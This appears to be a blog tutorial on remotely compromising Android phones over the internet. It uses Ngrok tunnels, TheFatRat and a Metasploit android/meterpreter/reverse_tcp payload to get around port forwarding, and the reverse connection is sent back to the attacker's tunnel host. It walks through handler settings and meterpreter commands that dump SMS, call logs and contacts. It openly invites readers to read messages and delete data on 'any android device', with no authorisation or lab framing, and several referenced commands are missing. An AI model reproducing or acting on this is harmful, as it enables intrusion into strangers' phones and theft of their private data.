Today I will be going to teach you How To Hack An Android Device Without Port Forwarding. We will be doing post exploitation attack using Metasploit to hack any android device over the internet without port forwarding. On the LAN it is easy to connect through reverse TCP connection with Meterpreter but you cannot do the same thing over WAN. But in this tutorial, I will tell you how you can do this.
You can easily connect to the android device with this method and do whatever you want like dump SMS, download pics, delete data, read messages etc.
You may need a Static IP address and a port forwarded but it's difficult to do that as we have limited to access to ports on our network.
Now Let’s Start,
Now to start our tutorial you may need Ngrok Secure Tunnels to Localhost. Sign up for a free account on Ngrok and download the package for your Linux OS. Remember to download the package according to your system.
After Downloading the package unzip the file by the following command.
Now provide the authentication code you got on the dashboard page of your ngrok by the following command:
./ngrok authtoken <Authentication Code>
./ngrok http 4431Or to create a tunnel over TCP type in the following command:
./ngrok tcp 4444
You can Download TheFatRat From the following Link:
Use The Following Command To Install Fatrat
Now we will choose the third payload you can select according to your need.
Now Metasploit will ask you for the LHOST and the LPORT. Here you need to put the hostname of ngrok and the port. You can look for the hostname and port in the dashboard menu.
Now we will select the third payload that is android/meterpreter/reverse_tcp for a reverse connection.
Now it will ask you for the configuration file name. put any name and let it go. The malicious payload will be created in the following directory.
MsfconsoleNext, we will use the multihandler exploit. Type in the following command:
After that set, the following payload by this command set payload android/meterpreter/reverse_tcp
Now put the LHOST and LPORT as the following:
Set LHOST 0.0.0.0
Set LPORT 4444
You can use pwd command to dump the data of the target system. Data is stored in the following path:
dump_calllog to dump the call logs from the remote device.
dump_contacts to dump all contacts from the remote device.
dump_sms to dump all SMS messages from the remote device.